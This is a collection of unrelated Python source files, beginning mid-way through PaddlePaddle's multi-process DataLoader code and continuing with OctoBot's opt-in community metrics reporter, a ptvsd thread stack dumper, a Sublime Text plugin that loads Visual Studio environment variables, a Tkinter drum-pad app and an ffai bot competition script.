logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
@classmethod
def _check_input_array(cls, item):
if isinstance(item, paddle.Tensor):
return
arr = np.array(item)
if arr.dtype == np.object:
raise TypeError((
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor."))
def __next__(self):
try:
if in_dygraph_mode():
return self._reader.read_next_var_list()
else:
if self._return_list:
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
return self._reader.read_next_list()[0]
else:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._reader.reset()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep order mode holds sub-threads
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
# NOTE(chenweihang): _worker_loop must be top level method to be pickled
def _worker_loop(dataset, dataset_kind, indices_queue, out_queue, done_event,
collate_fn, init_fn, worker_id, num_workers,
use_shared_memory):
try:
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
# set signal handler
core._set_process_signal_handler()
global _worker_info
_worker_info = WorkerInfo(
id=worker_id, num_workers=num_workers, dataset=dataset)
init_exception = None
try:
if init_fn is not None:
init_fn(worker_id)
fetcher = _DatasetKind.create_fetcher(dataset_kind, dataset,
collate_fn, True)
except:
init_exception = Exception("init_fn failed in worker {}: " \
"{}".format(worker_id, sys.exc_info()))
iterator_drained = False
parent_watch_dog = ParentWatchDog()
while parent_watch_dog.is_alive():
try:
data = indices_queue.get(MP_INDICES_CHECK_INTERVAL)
except queue.Empty:
continue
# None as poison piil, so worker event should be set
if data is None:
assert done_event.is_set() or iterator_drained, \
"get None when worker done_event set"
break
# If worker done event is set but get still get data in
# indices_queue, remaining data should be get and skipped.
if done_event.is_set() or iterator_drained:
continue
idx, indices = data
try:
if init_exception is not None:
batch = init_exception
init_exception = None
else:
batch = fetcher.fetch(indices)
except Exception as e:
if isinstance(
e, StopIteration) and dataset_kind == _DatasetKind.ITER:
out_queue.put(_IterableDatasetStopIteration(worker_id))
iterator_drained = True
else:
out_queue.put((idx, e))
else:
if use_shared_memory:
# FIXME(dkp): _convert_to_tensor_list only support np.array
# list now, should support paddle.Tensor list
if isinstance(batch[0][0], paddle.Tensor):
np_batch = []
for sample in batch:
np_batch.append([s.numpy() for s in sample])
batch = np_batch
tensor_list = core._convert_to_tensor_list(batch)
out_queue.put((idx, tensor_list))
core._remove_tensor_list_mmap_fds(tensor_list)
else:
out_queue.put((idx, batch))
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
finally:
if use_shared_memory:
_cleanup_mmap()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._collate_fn, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self):
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
elif isinstance(batch, Exception):
self._exit_thread_unexpectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices is generated infinitely
# for each worker to raise StopIteration, but a StopIteration
# raising process will discard a batch indices which is count
# in _send_idx but will not increase _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 2 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers, if batches among workers drained, there
# may also be data in blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 2:
return self._task_infos.pop(self._rcvd_idx)[1]
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_INDICES_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker get StopIteraion, we shutdown this worker,
# note that this batch indices to trigger StopIteration
# is discard, outstanding batch number should be decrease
# and another indices should be put for other workers
# may still working.
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch = data
if idx == self._rcvd_idx:
del self._task_infos[idx]
return batch
else:
self._task_infos[idx] += (batch, )
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in main process(for our implement has blocking queue,
# and blocking queue read is in main process) and thread, which may
# cause error following error
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-enter in increase _send_idx
# add a lock for threading save, for _try_put_indices is only a slight
# function which is not in data reading pipeline, this lock almost no
# influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
else:
if self._return_list:
data = self._reader.read_next_list()
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.reset()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
community_manager.py | # This file is part of OctoBot (https://github.com/Drakkar-Software/OctoBot)
# Copyright (c) 2021 Drakkar-Software, All rights reserved.
#
# OctoBot is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# OctoBot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with OctoBot. If not, see <https://www.gnu.org/licenses/>.
import time
import asyncio
import json
import requests
import threading
import octobot_commons.logging as logging
import octobot_commons.configuration as configuration
import octobot_commons.os_util as os_util
import octobot_commons.symbol_util as symbol_util
import octobot_commons.constants as common_constants
import octobot_evaluators.api as evaluator_api
import octobot_evaluators.enums as evaluator_enums
import octobot_services.constants as service_constants
import octobot_trading.api as trading_api
import octobot.community.community_fields as community_fields
import octobot.constants as constants
class CommunityManager:
_headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
def __init__(self, octobot_api):
self.octobot_api = octobot_api
self.edited_config: configuration.Configuration = octobot_api.get_edited_config(dict_only=False)
self.enabled = self.edited_config.get_metrics_enabled()
self.reference_market = trading_api.get_reference_market(self.edited_config.config)
self.logger = logging.get_logger(self.__class__.__name__)
self.current_config = None
self.keep_running = True
self.session = octobot_api.get_aiohttp_session()
try:
self.bot_id = self.edited_config.get_metrics_id()
except KeyError:
self.bot_id = None
# these attributes will be set at the last moment to ensure relevance and let time for everything to startup
self.has_real_trader = None
self.has_simulator = None
self.exchange_managers = None
def _init_community_config(self):
self.has_real_trader = trading_api.is_trader_enabled_in_config(self.edited_config.config)
self.has_simulator = trading_api.is_trader_simulator_enabled_in_config(self.edited_config.config)
self.exchange_managers = trading_api.get_exchange_managers_from_exchange_ids(
self.octobot_api.get_exchange_manager_ids())
async def start_community_task(self):
if self.enabled:
try:
# first ensure this session is not just a configuration test: register after a timer
await asyncio.sleep(common_constants.TIMER_BEFORE_METRICS_REGISTRATION_SECONDS)
self._init_community_config()
await self.register_session()
while self.keep_running:
# send a keepalive at periodic intervals
await asyncio.sleep(common_constants.TIMER_BETWEEN_METRICS_UPTIME_UPDATE)
try:
await self._update_session()
except Exception as e:
self.logger.debug(f"Exception when handling community data : {e}")
except asyncio.CancelledError:
pass
except Exception as e:
self.logger.debug(f"Exception when handling community registration: {e}")
async def stop_task(self):
self.keep_running = False
await self.session.close()
@staticmethod
def should_register_bot(config: configuration.Configuration):
try:
config.get_metrics_id()
return True
except KeyError:
return False
@staticmethod
def background_get_id_and_register_bot(octobot_api):
community_manager = CommunityManager(octobot_api)
threading.Thread(target=community_manager._blocking_get_id_and_register).start()
def _blocking_get_id_and_register(self):
try:
resp = requests.get(f"{common_constants.METRICS_URL}{common_constants.METRICS_ROUTE_GEN_BOT_ID}",
headers=self._headers)
text = resp.text
if resp.status_code != 200:
self.logger.debug(f"Impossible to get bot id: status code: {resp.status_code}, text: {text}")
else:
self.bot_id = json.loads(text)
self._save_bot_id()
community = self._get_bot_community()
requests.post(f"{common_constants.METRICS_URL}{common_constants.METRICS_ROUTE_REGISTER}",
json=community, headers=self._headers)
except Exception as e:
self.logger.debug(f"Error when handling community: {e}")
async def register_session(self, retry_on_error=True):
self.current_config = await self._get_current_community_config()
await self._post_community_data(common_constants.METRICS_ROUTE_REGISTER, self.current_config, retry_on_error)
async def _update_session(self, retry_on_error=True):
self.current_config[community_fields.CommunityFields.CURRENT_SESSION.value][
community_fields.CommunityFields.UP_TIME.value] = int(time.time() - self.octobot_api.get_start_time())
self.current_config[community_fields.CommunityFields.CURRENT_SESSION.value][
community_fields.CommunityFields.PROFITABILITY.value] = self._get_profitability()
self.current_config[community_fields.CommunityFields.CURRENT_SESSION.value][
community_fields.CommunityFields.TRADED_VOLUMES.value] = self._get_traded_volumes()
await self._post_community_data(common_constants.METRICS_ROUTE_UPTIME, self.current_config, retry_on_error)
async def _get_current_community_config(self):
if not self.bot_id:
await self._init_bot_id()
if self.bot_id:
return self._get_bot_community()
def _get_bot_community(self):
return {
community_fields.CommunityFields.ID.value: self.bot_id,
community_fields.CommunityFields.CURRENT_SESSION.value: {
community_fields.CommunityFields.STARTED_AT.value: int(self.octobot_api.get_start_time()),
community_fields.CommunityFields.UP_TIME.value: int(time.time() - self.octobot_api.get_start_time()),
community_fields.CommunityFields.VERSION.value: constants.LONG_VERSION,
community_fields.CommunityFields.SIMULATOR.value: self.has_simulator,
community_fields.CommunityFields.TRADER.value: self.has_real_trader,
community_fields.CommunityFields.EVAL_CONFIG.value: self._get_eval_config(),
community_fields.CommunityFields.PAIRS.value: self._get_traded_pairs(),
community_fields.CommunityFields.EXCHANGES.value: list(trading_api.get_exchange_names()),
community_fields.CommunityFields.NOTIFICATIONS.value: self._get_notification_types(),
community_fields.CommunityFields.TYPE.value: os_util.get_octobot_type(),
community_fields.CommunityFields.PLATFORM.value: os_util.get_current_platform(),
community_fields.CommunityFields.REFERENCE_MARKET.value: self.reference_market,
community_fields.CommunityFields.PORTFOLIO_VALUE.value: self._get_real_portfolio_value(),
community_fields.CommunityFields.PROFITABILITY.value: self._get_profitability(),
community_fields.CommunityFields.TRADED_VOLUMES.value: self._get_traded_volumes(),
community_fields.CommunityFields.SUPPORTS.value: self._get_supports()
}
}
def _get_profitability(self):
total_origin_values = 0
total_profitability = 0
for exchange_manager in self.exchange_managers:
profitability, _, _, _, _ = trading_api.get_profitability_stats(exchange_manager)
total_profitability += float(profitability)
total_origin_values += float(trading_api.get_current_portfolio_value(exchange_manager))
return total_profitability * 100 / total_origin_values if total_origin_values > 0 else 0
def _get_traded_volumes(self):
volume_by_currency = {}
if self.has_real_trader:
trades = []
for exchange_manager in self.exchange_managers:
trades += trading_api.get_trade_history(exchange_manager, since=self.octobot_api.get_start_time())
for trade in trades:
# cost is in quote currency for a traded pair
currency = symbol_util.split_symbol(trade.symbol)[-1]
if currency in volume_by_currency:
volume_by_currency[currency] += float(trade.total_cost)
else:
volume_by_currency[currency] = float(trade.total_cost)
return volume_by_currency
def _get_supports(self):
supporting_exchanges = []
for exchange_manager in self.exchange_managers:
exchange_name = trading_api.get_exchange_name(exchange_manager)
if self.has_real_trader \
and trading_api.is_sponsoring(exchange_name) \
and trading_api.is_valid_account(exchange_manager):
supporting_exchanges.append(exchange_name)
supports = self.octobot_api.get_community_auth().supports
return {
community_fields.CommunityFields.EXCHANGES.value: supporting_exchanges,
community_fields.CommunityFields.ROLES.value: [supports.support_role],
community_fields.CommunityFields.DONATIONS.value: [str(donation) for donation in supports.donations]
}
def _get_real_portfolio_value(self):
if self.has_real_trader:
total_value = 0
for exchange_manager in self.exchange_managers:
current_value = trading_api.get_current_portfolio_value(exchange_manager)
# current_value might be 0 if no trades have been made / canceled => use origin value
if current_value == 0:
current_value = trading_api.get_origin_portfolio_value(exchange_manager)
total_value += current_value
return float(total_value)
else:
return 0
def _get_traded_pairs(self):
pairs = set()
for exchange_manager in self.exchange_managers:
pairs = pairs.union(trading_api.get_trading_pairs(exchange_manager))
return list(pairs)
def _get_notification_types(self):
has_notifications = service_constants.CONFIG_CATEGORY_NOTIFICATION in self.edited_config.config \
and service_constants.CONFIG_NOTIFICATION_TYPE in self.edited_config.config[
service_constants.CONFIG_CATEGORY_NOTIFICATION]
return self.edited_config.config[service_constants.CONFIG_CATEGORY_NOTIFICATION][
service_constants.CONFIG_NOTIFICATION_TYPE] if has_notifications else []
def _get_eval_config(self):
tentacle_setup_config = self.octobot_api.get_tentacles_setup_config()
# trading mode
config_eval = []
if (trading_mode := self.octobot_api.get_trading_mode()) is not None:
config_eval.append(trading_mode.get_name())
# strategies
for strategy in evaluator_api.get_evaluator_classes_from_type(
evaluator_enums.EvaluatorMatrixTypes.STRATEGIES.value,
tentacle_setup_config):
config_eval.append(strategy.get_name())
# evaluators
evaluators = evaluator_api.get_evaluator_classes_from_type(evaluator_enums.EvaluatorMatrixTypes.TA.value,
tentacle_setup_config)
evaluators += evaluator_api.get_evaluator_classes_from_type(evaluator_enums.EvaluatorMatrixTypes.SOCIAL.value,
tentacle_setup_config)
evaluators += evaluator_api.get_evaluator_classes_from_type(
evaluator_enums.EvaluatorMatrixTypes.REAL_TIME.value,
tentacle_setup_config)
for evaluator in evaluators:
config_eval.append(evaluator.get_name())
return config_eval
async def _init_bot_id(self):
try:
async with self.session.get(f"{common_constants.METRICS_URL}{common_constants.METRICS_ROUTE_GEN_BOT_ID}",
headers=self._headers) as resp:
text = await resp.text()
if resp.status != 200:
self.logger.debug(f"Impossible to get bot id: status code: {resp.status}, text: {text}")
else:
self.bot_id = json.loads(text)
self._save_bot_id()
except Exception as e:
self.logger.debug(f"Error when handling community data : {e}")
def _save_bot_id(self):
if common_constants.CONFIG_METRICS not in self.edited_config.config \
or not self.edited_config.config[common_constants.CONFIG_METRICS]:
self.edited_config.config[common_constants.CONFIG_METRICS] = {common_constants.CONFIG_ENABLED_OPTION: True}
self.edited_config.config[common_constants.CONFIG_METRICS][common_constants.CONFIG_METRICS_BOT_ID] = self.bot_id
self.edited_config.save()
async def _post_community_data(self, route, bot, retry_on_error):
try:
async with self.session.post(f"{common_constants.METRICS_URL}{route}", json=bot,
headers=self._headers) as resp:
await self._handle_post_error(resp, retry_on_error)
except Exception as e:
self.logger.debug(f"Error when handling community data : {e}")
async def _handle_post_error(self, resp, retry_on_error):
if resp.status != 200:
if resp.status == 404:
# did not found bot with id in config: generate new id and register new bot
if retry_on_error:
await self._init_bot_id()
await self.register_session(retry_on_error=False)
else:
self.logger.debug(f"Impossible to send community data : "
f"status code: {resp.status}, "
f"text: {await resp.text()}")
|
stacks.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
"""Provides facilities to dump all stacks of all threads in the process.
"""
import os
import sys
import time
import threading
import traceback
from ptvsd.common import log
def dump():
"""Dump stacks of all threads in this process, except for the current thread.
"""
tid = threading.current_thread().ident
pid = os.getpid()
log.info("Dumping stacks for process {0}...", pid)
for t_ident, frame in sys._current_frames().items():
if t_ident == tid:
continue
for t in threading.enumerate():
if t.ident == tid:
t_name = t.name
t_daemon = t.daemon
break
else:
t_name = t_daemon = "<unknown>"
stack = "".join(traceback.format_stack(frame))
log.info(
"Stack of thread {0} (tid={1}, pid={2}, daemon={3}):\n\n{4}",
t_name,
t_ident,
pid,
t_daemon,
stack,
)
log.info("Finished dumping stacks for process {0}.", pid)
def dump_after(secs):
"""Invokes dump() on a background thread after waiting for the specified time.
"""
def dumper():
time.sleep(secs)
try:
dump()
except:
log.exception()
thread = threading.Thread(target=dumper)
thread.daemon = True
thread.start()
|
set_vc_vars.py | import sublime
import sublime_plugin
from threading import Thread
from subprocess import Popen, PIPE
from os import environ
# Related reading;
# https://stackoverflow.com/questions/39881091/how-to-run-sublimetext-with-visual-studio-environment-enabled/
# For the unfamiliar, Visual Studio ships with a batch file which sets up the
# environment variables you need to be able to run visual studio tools from a
# command prompt.
#
# This pluguin was written in response to someone that wanted to know how you
# could run Sublime and have it have the visual studio environment already set
# up.
#
# This plugin will use a subprocess to execute the batch file in the background
# and then issue the 'set' command to get the command interpreter to output the
# state of the environment before it exits.
#
# This output is gathered and parsed to come up with a dictionary similar to
# the environ table that python uses. From here we can easily detect what new
# environment variables were added and the values of those that changed, and
# set them as appropriate.
#
# As written Sublime needs to be restarted in order to execute the batch file
# again. A more elegant solution would be to save the environment prior to
# modifying it so that it could be restored and a new environment applied.
# To use this, you need to specify a setting in your user preferences named
# 'vc_vars_cmd' which should contain a complete path to the batch file you want
# to execute. Optionally you can also specify 'vc_vars_arch', which will be
# passed as a command line argument to the batch file executed. Remember that
# the preferences are JSON, so you need to quote all path separators.
SENTINEL="SUBL_VC_VARS"
def _get_vc_env():
"""
Run the batch file specified in the vc_vars_cmd setting (with an
optional architecture type) and return back a dictionary of the
environment that the batch file sets up.
Returns None if the preference is missing or the batch file fails.
"""
settings = sublime.load_settings("Preferences.sublime-settings")
vars_cmd = settings.get("vc_vars_cmd")
vars_arch = settings.get("vc_vars_arch", "amd64")
if vars_cmd is None:
print("set_vc_vars: Cannot set Visual Studio Environment")
print("set_vc_vars: Add 'vc_vars_cmd' setting to settings and restart")
return None
try:
# Run the batch, outputting a sentinel value so we can separate out
# any error messages the batch might generate.
shell_cmd = "\"{0}\" {1} && echo {2} && set".format(
vars_cmd, vars_arch, SENTINEL)
output = Popen(shell_cmd, stdout=PIPE, shell=True).stdout.read()
lines = [line.strip() for line in output.decode("utf-8").splitlines()]
env_lines = lines[lines.index(SENTINEL) + 1:]
except:
return None
# Convert from var=value to dictionary key/value pairs. We upper case the
# keys, since Python does that to the mapping it stores in environ.
env = {}
for env_var in env_lines:
parts = env_var.split("=", maxsplit=1)
env[parts[0].upper()] = parts[1]
return env
def install_vc_env():
"""
Try to collect the appropriate Visual Studio environment variables and
set them into the current environment.
"""
vc_env = _get_vc_env()
if vc_env is None:
print("set_vc_vars: Unable to fetch the Visual Studio Environment")
return sublime.status_message("Error fetching VS Environment")
# Add newly set environment variables
for key in vc_env.keys():
if key not in environ:
environ[key] = vc_env[key]
# Update existing variables whose values changed.
for key in environ:
if key in vc_env and environ[key] != vc_env[key]:
environ[key] = vc_env[key]
# Set a sentinel variable so we know not to try setting up the path again.
environ[SENTINEL] = "BOOTSTRAPPED"
sublime.status_message("VS Environment enabled")
def plugin_loaded():
if sublime.platform() != "windows":
return sublime.status_message("VS is not supported on this platform")
# To reload the environment if it changes, restart Sublime.
if SENTINEL in environ:
return sublime.status_message("VS Environment already enabled")
# Update in the background so we don't block the UI
Thread(target=install_vc_env).start()
|
beatBoard.py | from tkinter import *
from playsound import playsound
from threading import Thread
class padSound:
def __init__(self, soundLocation):
self.soundLocation = soundLocation
def given_sound(self):
playsound(self.soundLocation)
def play_sound(self,event):
sound = Thread(target=self.given_sound)
sound.start()
# All the locations of the sounds
kickLocation = './Beat-Board/Sounds/Kick.wav'
hiHatLocation = './Beat-Board/Sounds/hiHat.wav'
snareLocation = './Beat-Board/Sounds/snare.wav'
pad1Location = './Beat-Board/Sounds/Pad1.wav'
pad2Location = './Beat-Board/Sounds/Pad2.wav'
pad3Location = './Beat-Board/Sounds/Pad3.wav'
pad4Location = './Beat-Board/Sounds/Pad4.wav'
pad5Location = './Beat-Board/Sounds/Pad5.wav'
pad6Location = './Beat-Board/Sounds/Pad6.wav'
# Create drum objects
kickDrum = padSound(kickLocation)
hiHatDrum = padSound(hiHatLocation)
snareDrum = padSound(snareLocation)
# Create pad objects
pad1 = padSound(pad1Location)
pad2 = padSound(pad2Location)
pad3 = padSound(pad3Location)
pad4 = padSound(pad4Location)
pad5 = padSound(pad5Location)
pad6 = padSound(pad6Location)
def create_layout():
# Creates the Frame
frame_a = Frame(master=main_window, width=500, height=500, bg="black")
frame_a.grid(rowspan=3, columnspan=3)
frame_a.focus_set()
# Creates the Buttons
# ------------------------------------------------
# Kick Button
kickButton = Button(text="Kick", height=5, width=10)
frame_a.bind('q', kickDrum.play_sound)
kickButton.bind("<Button-1>", kickDrum.play_sound)
# Hi-hat Button
hihatButton = Button(text="Hi-Hat", height=5, width=10)
frame_a.bind('w', hiHatDrum.play_sound)
hihatButton.bind("<Button-1>", hiHatDrum.play_sound)
# Snare Button
snareButton = Button(text="Snare", height=5, width=10)
frame_a.bind('e', snareDrum.play_sound)
snareButton.bind("<Button-1>", snareDrum.play_sound)
# -------------------------------------------------
# Pad 1
pad1Button = Button(text="Pad 1", height=5, width=10)
frame_a.bind('a', pad1.play_sound)
pad1Button.bind("<Button-1>", pad1.play_sound)
# Pad 2
pad2Button = Button(text="Pad 2", height=5, width=10)
frame_a.bind('s', pad2.play_sound)
pad2Button.bind("<Button-1>", pad2.play_sound)
# Pad 3
pad3Button = Button(text="Pad 3", height=5, width=10)
frame_a.bind('d', pad3.play_sound)
pad3Button.bind("<Button-1>", pad2.play_sound)
# -------------------------------------------------
# Pad 4
pad4Button = Button(text="Pad 4", height=5, width=10)
frame_a.bind('z', pad4.play_sound)
pad4Button.bind("<Button-1>", pad4.play_sound)
# Pad 5
pad5Button = Button(text="Pad 5", height=5, width=10)
frame_a.bind('x', pad5.play_sound)
pad5Button.bind("<Button-1>", pad5.play_sound)
# Pad 6
pad6Button = Button(text="Pad 6", height=5, width=10)
frame_a.bind('c', pad6.play_sound)
pad6Button.bind("<Button-1>", pad6.play_sound)
# -------------------------------------------------
# Display Buttons
kickButton.grid(row=0)
hihatButton.grid(row=0, column=1)
snareButton.grid(row=0, column=2)
pad1Button.grid(row=1)
pad2Button.grid(row=1, column=1)
pad3Button.grid(row=1, column=2)
pad4Button.grid(row=2)
pad5Button.grid(row=2, column=1)
pad6Button.grid(row=2, column=2)
main_window = Tk()
main_window.resizable(False,False)
main_window.title('Beat Board')
create_layout()
main_window.mainloop()
|
competition_example.py | #!/usr/bin/env python3
import ffai
import socket
from ffai.ai.competition import PythonSocketClient, PythonSocketServer
from multiprocessing import Process
import time
import secrets
import ffai
import socket
def run_agent(registration_name, port, token):
"""
Starts a server that hosts an agent.
"""
agent = ffai.make_bot(registration_name)
server = PythonSocketServer(agent, port, token)
server.run()
# Run servers
token_a = secrets.token_hex(32)
print(f"Token A: {token_a}")
process_a = Process(target=run_agent, args=('random', 5100, token_a))
process_a.start()
token_b = secrets.token_hex(32)
print(f"Token B: {token_b}")
process_b = Process(target=run_agent, args=('random', 5200, token_b))
process_b.start()
# Specify the host running the agents (localhost)
hostname = socket.gethostname()
# Make sure the agents are running
time.sleep(2)
# Load configurations, rules, arena and teams
config = ffai.load_config("bot-bowl-iii")
ruleset = ffai.load_rule_set(config.ruleset)
arena = ffai.load_arena(config.arena)
team_a = ffai.load_team_by_filename("human", ruleset)
team_b = ffai.load_team_by_filename("human", ruleset)
# Make proxy agents
hostname = socket.gethostname()
client_a = PythonSocketClient("Player A", hostname, 5100, token=token_a)
client_b = PythonSocketClient("Player B", hostname, 5200, token=token_b)
# Run competition
competition = ffai.Competition(client_a, client_b, team_a, team_b, config=config, ruleset=ruleset, arena=arena, n=2, record=True)
competition.run()
competition.results.print()
# Shut down everything
process_a.terminate()
process_a.join()
process_b.terminate()
process_b.join()
